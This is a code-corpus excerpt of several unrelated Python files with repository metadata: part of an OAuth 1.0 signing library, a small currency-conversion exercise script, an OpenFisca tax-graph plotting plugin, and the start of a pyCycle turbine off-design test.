httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = parse_qs(body)
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise Error('Signature method %s not supported try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def sign(self, request, consumer, token):
"""Builds the base signature string."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
|
mit
| -5,403,328,534,905,743,000
| 32.807648
| 265
| 0.609199
| false
| 4.254302
| false
| false
| false
|
uxlsl/uxlsl.github.io
|
demo/code/test/xiyanghui.py
|
1
|
1481
|
import requests
infos = requests.get('https://job.xiyanghui.com/api/q1/json').json()
def build(n, parent, dic):
dic[n["id"]] = {"name": n["name"], "parent": parent}
for i in n.get("children", []):
build(i, n["id"], dic)
def builds(infos, dic):
for i in infos:
build(i, -1, dic)
def check(dic, id):
if id not in dic:
return '不存在'
lst = []
while id != -1:
lst.append(dic[id]['name'])
id = dic[id]["parent"]
return '>'.join(lst[::-1])
dic = {}
builds(infos, dic)
print(check(dic, 1120))
print(check(dic, 2221))
##############################
# 请根据汇率接口实现 SDK 类,可提供方法,输入币种与价格,输出人民币相应的实时价格。
rates = requests.get('https://app-cdn.2q10.com/api/v2/currency').json()
class RateConverter:
@staticmethod
def convertToCNY(s):
small = {j:i for i,j in [('USD', '$'),('GBP', '£'),('EUR', '€'),('HKD','HK$'),('JPY', '¥')]}
coin = ''
num = 0
for index, c in enumerate(s):
if c.isdigit():
coin = s[:index]
num = float(s[index:].replace(',', ''))
if coin in small:
coin = small[coin]
return num / rates['rates'][coin] * rates['rates']['CNY']
return -1
for i in ['$1,999.00', 'HKD2399', 'EUR499.99', '€499.99']:
print('输入 {}, 输出 {}'.format(i, RateConverter.convertToCNY(i)))
|
mit
| 2,871,237,075,796,517,400
| 23.75
| 100
| 0.501805
| false
| 2.77
| false
| false
| false
|
openfisca/openfisca-qt
|
openfisca_qt/plugins/scenario/graph.py
|
1
|
26654
|
# -*- coding:utf-8 -*-
# Copyright © 2011 Clément Schaff, Mahdi Ben Jelloul
"""
openFisca, Logiciel libre de simulation du système socio-fiscal français
Copyright © 2011 Clément Schaff, Mahdi Ben Jelloul
This file is part of openFisca.
openFisca is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
openFisca is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with openFisca. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import division
import locale
import os
from matplotlib.lines import Line2D
from matplotlib.patches import Rectangle, FancyArrow
from matplotlib.ticker import FuncFormatter
import numpy as np
#from openfisca_core import model
from ...gui.baseconfig import get_translation
from ...gui.config import get_icon
from ...gui.qt.compat import (to_qvariant, getsavefilename)
from ...gui.qt.QtCore import (
QAbstractItemModel, QModelIndex, Qt, SIGNAL, QSize, QString,
)
from ...gui.qt.QtGui import (
QColor, QVBoxLayout, QDialog, QMessageBox, QTreeView, QIcon, QPixmap, QHBoxLayout, QPushButton,
)
from ...gui.utils.qthelpers import create_action
from ...gui.views.ui_graph import Ui_Graph
from .. import OpenfiscaPluginWidget
from ..utils import OutNode
_ = get_translation('openfisca_qt')
locale.setlocale(locale.LC_ALL, '')
class GraphFormater(QDialog):
def __init__(self, data, mode, parent = None):
super(GraphFormater, self).__init__(parent)
self.setObjectName(u'Affichage')
self.setWindowTitle(u'Options du graphique')
self.data = data
self.parent = parent
view = QTreeView(self)
view.setIndentation(10)
self.model = DataModel(data, mode, self)
view.setModel(self.model)
VLayout = QVBoxLayout()
HLayout = QHBoxLayout()
allBtn = QPushButton(u'Tout cocher')
noneBtn = QPushButton(u'Tout décocher')
HLayout.addWidget(allBtn)
HLayout.addWidget(noneBtn)
self.setLayout(VLayout)
VLayout.addLayout(HLayout)
VLayout.addWidget(view)
self.connect(self.model, SIGNAL('dataChanged(QModelIndex, QModelIndex)'), self.updateGraph)
self.connect(allBtn, SIGNAL('clicked()'), self.checkAll)
self.connect(noneBtn, SIGNAL('clicked()'), self.checkNone)
def checkAll(self):
self.data.setLeavesVisible()
self.updateGraph()
self.model.reset()
def checkNone(self):
self.data.hideAll()
self.updateGraph()
self.model.reset()
def updateGraph(self):
self.parent.updateGraph2()
def colorIcon(color):
r, g, b = color
qcolor = QColor(r, g, b)
size = QSize(22,22)
pixmap = QPixmap(size)
pixmap.fill(qcolor)
return QIcon(pixmap)
class DataModel(QAbstractItemModel):
def __init__(self, root, mode, parent=None):
super(DataModel, self).__init__(parent)
self._rootNode = root
self.mode = mode
def rowCount(self, parent):
if not parent.isValid():
parentNode = self._rootNode
else:
parentNode = self.getNode(parent)
return parentNode.childCount()
def columnCount(self, parent):
return 1
def data(self, index, role = Qt.DisplayRole):
if not index.isValid():
return None
node = self.getNode(index)
if role == Qt.DisplayRole or role == Qt.EditRole:
return to_qvariant(node.desc)
if role == Qt.DecorationRole:
return colorIcon(node.color)
if role == Qt.CheckStateRole:
return to_qvariant(2*(node.visible>=1))
def setData(self, index, value, role = Qt.EditRole):
if not index.isValid():
return None
node = self.getNode(index)
if role == Qt.CheckStateRole:
if not(node.parent == self._rootNode):
first_index = self.createIndex(node.parent.row(), 0, node.parent)
else:
first_sibling = node.parent.children[0]
first_index = self.createIndex(first_sibling.row(), 0, first_sibling)
last_sibling = node.parent.children[-1]
last_index = self.createIndex(last_sibling.row(), 0, last_sibling)
if self.mode == 'bareme':
if node.visible>=1: node.visible = 0
else: node.visible = 1
else:
if node.visible>=1: node.setHidden()
else: node.setVisible()
self.dataChanged.emit(first_index, last_index)
return True
return False
def headerData(self, section, orientation, role):
if role == Qt.DisplayRole:
if section == 0: return u"Variable"
def flags(self, index):
node = self.getNode(index)
if np.any(node.vals != 0):
return Qt.ItemIsEnabled | Qt.ItemIsSelectable | Qt.ItemIsUserCheckable
else:
return Qt.ItemIsSelectable
"""Should return the parent of the node with the given QModelIndex"""
def parent(self, index):
node = self.getNode(index)
parentNode = node.parent
if parentNode == self._rootNode:
return QModelIndex()
return self.createIndex(parentNode.row(), 0, parentNode)
"""Should return a QModelIndex that corresponds to the given row, column and parent node"""
def index(self, row, column, parent):
parentNode = self.getNode(parent)
childItem = parentNode.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QModelIndex()
def getNode(self, index):
if index.isValid():
node = index.internalPointer()
if node:
return node
return self._rootNode
class ScenarioGraphWidget(OpenfiscaPluginWidget, Ui_Graph):
"""
Scenario Graph Widget
"""
CONF_SECTION = 'composition'
def __init__(self, parent = None):
super(ScenarioGraphWidget, self).__init__(parent)
self.setupUi(self)
self._parent = parent
self.mplwidget.mpl_connect('pick_event', self.on_pick)
self.mplwidget.mpl_connect('motion_notify_event', self.pick)
self.connect(self.option_btn, SIGNAL('clicked()'), self.set_option)
self.connect(self.taux_btn, SIGNAL('stateChanged(int)'), self.set_taux)
self.connect(self.hidelegend_btn, SIGNAL('toggled(bool)'), self.hide_legend)
self.taux = False
self.legend = True
self.simulation = None
self.setLayout(self.verticalLayout)
self.initialize_plugin()
#------ Public API ---------------------------------------------
def set_taux(self, value):
"""
Switch on/off the tax rates view
Parameters
----------
value : bool
If True, switch to tax rates view
"""
if value: self.taux = True
else: self.taux = False
self.updateGraph2()
def hide_legend(self, value):
if value: self.legend = False
else: self.legend = True
self.updateGraph2()
def set_option(self):
'''
Sets graph options
'''
try:
mode = self.simulation.mode
except:
mode = 'bareme'
gf = GraphFormater(self.data, mode, self)
gf.exec_()
def pick(self, event):
if not event.xdata is None and not event.ydata is None:
self.mplwidget.figure.pick(event)
else:
self.setToolTip("")
def on_pick(self, event):
label = event.artist._label
self.setToolTip(label)
def updateGraph(self, scenario):
"""
Update the graph according to simulation
"""
self.scenario = scenario
print scenario
# TODO: link the decompsotion with parameters
data = OutNode.create_from_scenario_decomposition_json(
scenario = scenario,
simulation = None,
decomposiiton_json = None
)
dataDefault = data # TODO: data_default
reforme = scenario.reforme = False # TODO: fix this
mode = scenario.mode = "castype" # TODO: "castype" ou "bareme"
x_axis = scenario.x_axis = "sal" # TODO change this too
self.data = data
self.dataDefault = dataDefault
self.data.setLeavesVisible()
data['revdisp'].visible = 1
if mode == 'bareme': # TODO: make this country-totals specific
for rev in ['salsuperbrut', 'salbrut', 'chobrut', 'rstbrut']:
try:
data[rev].setHidden()
except:
pass
if reforme:
data.hideAll()
self.populate_absBox(x_axis, mode)
for axe in self.main.composition.XAXIS_PROPERTIES.itervalues():
if axe['name'] == x_axis:
self.graph_x_axis = axe['typ_tot_default']
break
self.updateGraph2()
def updateGraph2(self):
ax = self.mplwidget.axes
ax.clear()
currency = self.main.tax_benefit_system.CURRENCY
mode = self.scenario.mode
reforme = self.scenario.reforme
if mode == 'castype':
drawWaterfall(self.data, ax)
else:
if self.taux:
drawTaux(self.data, ax, self.graph_x_axis, reforme, self.dataDefault)
else:
drawBareme(self.data, ax, self.graph_x_axis, reforme, self.dataDefault, self.legend, currency = currency)
self.mplwidget.draw()
def populate_absBox(self, x_axis, mode):
self.disconnect(self.absBox, SIGNAL('currentIndexChanged(int)'), self.x_axis_changed)
self.absBox.clear()
if mode == 'castype':
self.absBox.setEnabled(False)
self.taux_btn.setEnabled(False)
self.hidelegend_btn.setEnabled(False)
return
self.taux_btn.setEnabled(True)
self.absBox.setEnabled(True)
self.hidelegend_btn.setEnabled(True)
for axe in model.x_axes.itervalues():
if axe.name == x_axis:
typ_revs_labels = axe.typ_tot.values()
typ_revs = axe.typ_tot.keys()
self.absBox.addItems(typ_revs_labels) # TODO: get label from description
self.absBox.setCurrentIndex(typ_revs.index(axe.typ_tot_default))
self.connect(self.absBox, SIGNAL('currentIndexChanged(int)'), self.x_axis_changed)
return
def x_axis_changed(self):
mode = self.simulation.mode
if mode == "bareme":
text = self.absBox.currentText()
for axe in self.main.composition.XAXIS_PROPERTIES.itervalues():
for key, label in axe.typ_tot.iteritems():
if text == label:
self.graph_x_axis = key
self.updateGraph2()
return
def save_figure(self, *args):
filetypes = self.mplwidget.get_supported_filetypes_grouped()
sorted_filetypes = filetypes.items()
sorted_filetypes.sort()
default_filetype = self.mplwidget.get_default_filetype()
output_dir = self.get_option('graph/export_dir')
start = os.path.join(output_dir, 'image.') + default_filetype
filters = []
selectedFilter = None
for name, exts in sorted_filetypes:
exts_list = " ".join(['*.%s' % ext for ext in exts])
filtre = '%s (%s)' % (name, exts_list)
if default_filetype in exts:
selectedFilter = filtre
filters.append(filtre)
filters = ';;'.join(filters)
fname, format = getsavefilename(
self, _("Save image"), start, filters, selectedFilter) # "Enregistrer l'image"
if fname:
output_dir = os.path.dirname(str(fname))
self.main.composition.set_option('graph/export_dir', output_dir)
try:
self.mplwidget.print_figure( fname )
except Exception, e:
QMessageBox.critical(
self, _("Error when saving image"), str(e),
QMessageBox.Ok, QMessageBox.NoButton)
#------ OpenfiscaPluginMixin API ---------------------------------------------
#------ OpenfiscaPluginWidget API ---------------------------------------------
def get_plugin_title(self):
"""
Return plugin title
Note: after some thinking, it appears that using a method
is more flexible here than using a class attribute
"""
return _("Test case graphic")
def get_plugin_icon(self):
"""
Return plugin icon (QIcon instance)
Note: this is required for plugins creating a main window
(see OpenfiscaPluginMixin.create_mainwindow)
and for configuration dialog widgets creation
"""
return get_icon('OpenFisca22.png')
def get_plugin_actions(self):
"""
Return a list of actions related to plugin
Note: these actions will be enabled when plugin's dockwidget is visible
and they will be disabled when it's hidden
"""
self.save_action = create_action(
self, _("Save &graph"),
icon = 'filesave.png',
tip = _("Save test case graph"),
triggered = self.save_figure
)
self.register_shortcut(
self.save_action,
context = "Graph",
name =_("Save test case graph"),
default = "Ctrl+G"
)
self.file_menu_actions = [self.save_action]
self.main.file_menu_actions += self.file_menu_actions
return self.file_menu_actions
def register_plugin(self):
"""
Register plugin in OpenFisca's main window
"""
self.main.add_dockwidget(self)
def refresh_plugin(self):
'''
Update Graph
'''
self.updateGraph(self.main.scenario)
def closing_plugin(self, cancelable=False):
"""
Perform actions before parent main window is closed
Return True or False whether the plugin may be closed immediately or not
Note: returned value is ignored if *cancelable* is False
"""
return True
def draw_simulation_bareme(simulation, ax, graph_x_axis = None, legend = False, position = 1):
"""
Draws a bareme on matplotlib.axes.Axes
"""
reforme = simulation.reforme
alter = (simulation.alternative_scenario is not None)
currency = self.main.tax_benefit_system.CURRENCY
simulation.compute()
data = simulation.data
data_default = simulation.data_default
data.setLeavesVisible()
data_default.setLeavesVisible()
if graph_x_axis is None:
graph_x_axis = 'sal'
if not alter:
drawBareme(data, ax, graph_x_axis, reforme, data_default, legend, currecncy = currency)
else:
drawBaremeCompareHouseholds(data, ax, graph_x_axis, data_default, legend, currecny = currency, position = position)
def draw_simulation_taux(simulation, ax, graph_x_axis = None, legend = True):
"""
Draws a bareme on matplotlib.axes.Axes object ax
"""
reforme = simulation.reforme or (simulation.alternative_scenario is not None)
simulation.compute()
data, data_default = simulation.data, simulation.data_default
data.setLeavesVisible()
data_default.setLeavesVisible()
if graph_x_axis is None:
graph_x_axis = 'sal'
drawTaux(data, ax, graph_x_axis, reforme, data_default, legend = legend)
def draw_simulation_waterfall(simulation, ax):
"""
Draws a waterfall on matplotlib.axes.Axes object ax
"""
data, data_default = simulation.compute()
del data_default
data.setLeavesVisible()
drawWaterfall(data, ax)
def drawWaterfall(data, ax, currency = None):
ax.figure.subplots_adjust(bottom = 0.15, right = 0.95, top = 0.95, left = 0.1)
barwidth = 0.8
number = [0]
patches = []
codes = []
shortnames = []
def drawNode(node, prv):
prev = prv + 0
val = node.vals[0]
bot = prev
for child in node.children:
drawNode(child, prev)
prev += child.vals[0]
if (val != 0) and node.visible:
r, g, b = node.color
arrow = FancyArrow(
number[0] + barwidth / 2, bot, 0, val,
width = barwidth,
fc = (r / 255, g / 255, b / 255), linewidth = 0.5, edgecolor = 'black',
label = node.desc, picker = True, length_includes_head = True,
head_width = barwidth,
head_length = abs(val / 15),
)
arrow.top = bot + max(0, val)
arrow.absci = number[0] + 0
# a = Rectangle((number[0], bot), barwidth, val, fc = node.color, linewidth = 0.5, edgecolor = 'black', label = node.desc, picker = True)
arrow.value = round(val)
patches.append(arrow)
codes.append(node.code)
shortnames.append(node.shortname)
number[0] += 1
prv = 0
drawNode(data, prv)
for patch in patches:
ax.add_patch(patch)
n = len(patches)
abscisses = np.arange(n)
xlim = (- barwidth * 0.5, n - 1 + barwidth * 1.5)
ax.hold(True)
ax.plot(xlim, [0, 0], color = 'black')
ax.set_xticklabels(shortnames, rotation = '45')
ax.set_xticks(abscisses + barwidth / 2)
ax.set_xlim((-barwidth / 2, n - 1 + barwidth * 1.5))
ticks = ax.get_xticklines()
for tick in ticks:
tick.set_visible(False)
for rect in patches:
x = rect.absci
y = rect.top
val = u'{} {}'.format(int(rect.value), currency)
width = barwidth
if rect.value >= 0:
col = 'black'
else:
col = 'red'
ax.text(x + width / 2, y + 1, val, horizontalalignment = 'center',
verticalalignment = 'bottom', color= col, weight = 'bold')
m, M = ax.get_ylim()
ax.set_ylim((m, 1.05 * M))
def drawBareme(data, axes, x_axis, reform = False, reference_data = None,
legend = True, currency = None, legend_position = 2):
'''
Draws bareme
'''
if reference_data is None:
reference_data = data
axes.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
if reform:
prefix = 'Variation '
else:
prefix = ''
axes.hold(True)
x_axis_data = reference_data[x_axis]
n_points = len(x_axis_data.vals)
xlabel = x_axis_data.desc
axes.set_xlabel(xlabel)
axes.set_ylabel(prefix + u"{} ({} par an)".format(data.code, currency))
axes.set_xlim(np.amin(x_axis_data.vals), np.amax(x_axis_data.vals))
if not reform:
axes.set_ylim(np.amin(x_axis_data.vals), np.amax(x_axis_data.vals))
axes.plot(x_axis_data.vals, np.zeros(n_points), color = 'black', label = 'x_axis')
def drawNode(node, prv):
prev = prv + 0
if np.any(node.vals != 0) and node.visible:
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = axes.plot(
x_axis_data.vals,
node.vals,
color = col,
linewidth = 2,
label = prefix + node.desc,
)
else:
a = axes.fill_between(
x_axis_data.vals,
prev + node.vals,
prev,
color = col,
linewidth = 0.2,
edgecolor = 'black',
picker = True,
)
a.set_label(prefix + node.desc)
for child in node.children:
drawNode(child, prev)
prev += child.vals
prv = np.zeros(n_points)
drawNode(data, prv)
if legend:
createLegend(axes, position = legend_position)
def drawBaremeCompareHouseholds(data, ax, x_axis, dataDefault = None, legend = True , currency = "", position = 2):
'''
Draws bareme
'''
if dataDefault is None:
raise Exception('drawBaremeCompareHouseHolds: dataDefault must be defined')
ax.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
prefix = 'Variation '
ax.hold(True)
xdata = dataDefault[x_axis]
NMEN = len(xdata.vals)
xlabel = xdata.desc
ax.set_xlabel(xlabel)
ax.set_ylabel(prefix + u"Revenu disponible (" + currency + " par an)")
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.plot(xdata.vals, np.zeros(NMEN), color = 'black', label = 'x_axis')
code_list = ['af', 'cf', 'ars', 'rsa', 'aefa', 'psa', 'logt', 'irpp', 'ppe', 'revdisp']
def drawNode(node, prv):
minimum = 0
maximum = 0
prev = prv + 0
# if np.any(node.vals != 0) and node.visible and node.code != 'root' and node.code in code_list:
if np.any(node.vals != 0) and node.code != 'root' and node.code in code_list:
node.visible = True
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = ax.plot(xdata.vals, node.vals, color = col, linewidth = 2, label = prefix + node.desc)
else:
a = ax.fill_between(xdata.vals, prev + node.vals, prev, color = col, linewidth = 0.2,
edgecolor = 'black', picker = True)
a.set_label(prefix + node.desc)
for child in node.children:
drawNode(child, prev)
prev += child.vals
minimum = min([np.amin(prev), minimum])
maximum = max([np.amax(prev), maximum])
return minimum, maximum * 1.1
prv = np.zeros(NMEN)
minimum, maximum = drawNode(data, prv)
ax.set_ylim(minimum, maximum)
if legend:
createLegend(ax, position = position)
def drawBaremeCompareHouseholds2(data, ax, x_axis, dataDefault = None, legend = True, currency = "", position = 2):
'''
Draws bareme
'''
if dataDefault is None:
raise Exception('drawBaremeCompareHouseHolds: dataDefault must be defined')
ax.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
prefix = 'Variation '
ax.hold(True)
xdata = dataDefault[x_axis]
NMEN = len(xdata.vals)
xlabel = xdata.desc
ax.set_xlabel(xlabel)
ax.set_ylabel(prefix + u"Revenu disponible (" + currency + " par an)")
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.plot(xdata.vals, np.zeros(NMEN), color = 'black', label = 'x_axis')
node_list = ['af', 'cf', 'ars', 'rsa', 'aefa', 'psa', 'logt', 'irpp', 'ppe', 'revdisp']
prv = np.zeros(NMEN)
for nod in node_list:
node = data[nod]
prev = prv + 0
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = ax.plot(xdata.vals, node.vals, color = col, linewidth = 2, label = prefix + node.desc)
else:
a = ax.fill_between(xdata.vals, prev + node.vals, prev, color = col, linewidth = 0.2,
edgecolor = 'black', picker = True)
a.set_label(prefix + node.desc)
prv += node.vals
if legend:
createLegend(ax, position = position)
def percentFormatter(x, pos=0):
return '%1.0f%%' % (x)
def drawTaux(data, ax, x_axis, reforme = False, dataDefault = None, legend = True):
'''
Draws marginal and average tax rates
'''
if dataDefault is None:
dataDefault = data
print "x_axis :", x_axis
# TODO: the following is an ugly fix which is not general enough
if x_axis == "rev_cap_brut":
typ_rev = 'superbrut'
elif x_axis == "rev_cap_net":
typ_rev = 'net'
elif x_axis == "fon":
typ_rev = 'brut'
else:
for typrev, vars in model.REVENUES_CATEGORIES.iteritems():
if x_axis in vars:
typ_rev = typrev
RB = RevTot(dataDefault, typ_rev)
xdata = dataDefault[x_axis]
RD = dataDefault['revdisp'].vals
div = RB*(RB != 0) + (RB == 0)
taumoy = (1 - RD / div) * 100
taumar = 100 * (1 - (RD[:-1]-RD[1:]) / (RB[:-1]-RB[1:]))
ax.hold(True)
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.set_ylabel(r"$\left(1 - \frac{RevDisponible}{RevInitial} \right)\ et\ \left(1 - \frac{d (RevDisponible)}{d (RevInitial)}\right)$")
ax.set_ylabel(r"$\left(1 - \frac{RevDisponible}{RevInitial} \right)\ et\ \left(1 - \frac{d (RevDisponible)}{d (RevInitial)}\right)$")
ax.plot(xdata.vals, taumoy, label = u"Taux moyen d'imposition", linewidth = 2)
ax.plot(xdata.vals[1:], taumar, label = u"Taux marginal d'imposition", linewidth = 2)
ax.set_ylim(0,100)
ax.yaxis.set_major_formatter(FuncFormatter(percentFormatter))
if legend:
createLegend(ax)
def createLegend(ax, position = 2):
'''
Creates legend
'''
p = []
l = []
for collec in ax.collections:
if collec._visible:
p.insert(0, Rectangle((0, 0), 1, 1, fc = collec._facecolors[0], linewidth = 0.5, edgecolor = 'black' ))
l.insert(0, collec._label)
for line in ax.lines:
if line._visible and (line._label != 'x_axis'):
p.insert(0, Line2D([0,1],[.5,.5],color = line._color))
l.insert(0, line._label)
ax.legend(p,l, loc= position, prop = {'size':'medium'})
def RevTot(data, typrev):
'''
Computes total revenues by type with definition is country specific
'''
dct = model.REVENUES_CATEGORIES
first = True
try:
for var in dct[typrev]:
if first:
out = data[var].vals.copy() # WARNING: Copy is needed to avoid pointers problems (do not remove this line)!!!!
first = False
else:
out += data[var].vals
return out
except:
raise Exception("typrev is %s but typrev should be one of the following: %s" %(str(typrev), str(dct.keys())) )
|
agpl-3.0
| -2,987,348,892,159,805,400
| 33.338918
| 148
| 0.576875
| false
| 3.673928
| false
| false
| false
|
JustinSGray/pyCycle
|
pycycle/elements/test/test_turbine_od.py
|
1
|
7060
|
import numpy as np
import unittest
import os
from openmdao.api import Problem, Group
from openmdao.utils.assert_utils import assert_near_equal
from pycycle.mp_cycle import Cycle
from pycycle.thermo.cea.species_data import janaf
from pycycle.elements.turbine import Turbine
from pycycle.elements.combustor import Combustor
from pycycle.elements.flow_start import FlowStart
from pycycle.maps.lpt2269 import LPT2269
fpath = os.path.dirname(os.path.realpath(__file__))
ref_data = np.loadtxt(fpath + "/reg_data/turbineOD1.csv",
delimiter=",", skiprows=1)
header = [
'turb.PRdes',
'turb.effDes',
'shaft.Nmech',
'burn.FAR',
'burn.Fl_I.W',
'burn.Fl_I.Pt',
'burn.Fl_I.Tt',
'burn.Fl_I.ht',
'burn.Fl_I.s',
'burn.Fl_I.MN',
'burn.Fl_I.V',
'burn.Fl_I.A',
'burn.Fl_I.Ps',
'burn.Fl_I.Ts',
'burn.Fl_I.hs',
'turb.Fl_I.W',
'turb.Fl_I.Pt',
'turb.Fl_I.Tt',
'turb.Fl_I.ht',
'turb.Fl_I.s',
'turb.Fl_I.MN',
'turb.Fl_I.V',
'turb.Fl_I.A',
'turb.Fl_I.Ps',
'turb.Fl_I.Ts',
'turb.Fl_I.hs',
'turb.Fl_O.W',
'turb.Fl_O.Pt',
'turb.Fl_O.Tt',
'turb.Fl_O.ht',
'turb.Fl_O.s',
'turb.Fl_O.MN',
'turb.Fl_O.V',
'turb.Fl_O.A',
'turb.Fl_O.Ps',
'turb.Fl_O.Ts',
'turb.Fl_O.hs',
'turb.PR',
'turb.eff',
'turb.Np',
'turb.Wp',
'turb.pwr',
'turb.PRmap',
'turb.effMap',
'turb.NpMap',
'turb.WpMap',
'turb.s_WpDes',
'turb.s_PRdes',
'turb.s_effDes',
'turb.s_NpDes']
h_map = dict(((v_name, i) for i, v_name in enumerate(header)))
class TurbineODTestCase(unittest.TestCase):
def setUp(self):
self.prob = Problem()
cycle = self.prob.model = Cycle()
cycle.options['thermo_method'] = 'CEA'
cycle.options['thermo_data'] = janaf
cycle.options['design'] = False
cycle.add_subsystem('flow_start', FlowStart())
cycle.add_subsystem('burner', Combustor(fuel_type="JP-7"))
cycle.add_subsystem('turbine', Turbine( map_data=LPT2269))
cycle.set_input_defaults('burner.Fl_I:FAR', .01, units=None)
cycle.set_input_defaults('turbine.Nmech', 1000., units='rpm'),
cycle.set_input_defaults('flow_start.P', 17., units='psi'),
cycle.set_input_defaults('flow_start.T', 500.0, units='degR'),
cycle.set_input_defaults('flow_start.W', 0., units='lbm/s'),
cycle.set_input_defaults('turbine.area', 150., units='inch**2')
cycle.pyc_connect_flow("flow_start.Fl_O", "burner.Fl_I")
cycle.pyc_connect_flow("burner.Fl_O", "turbine.Fl_I")
self.prob.set_solver_print(level=-1)
self.prob.setup(check=False)
def test_case1(self):
# 6 cases to check against
for i, data in enumerate(ref_data):
# input turbine variables
self.prob['turbine.s_Wp'] = data[h_map['turb.s_WpDes']]
self.prob['turbine.s_eff'] = data[h_map['turb.s_effDes']]
self.prob['turbine.s_PR'] = data[h_map['turb.s_PRdes']]
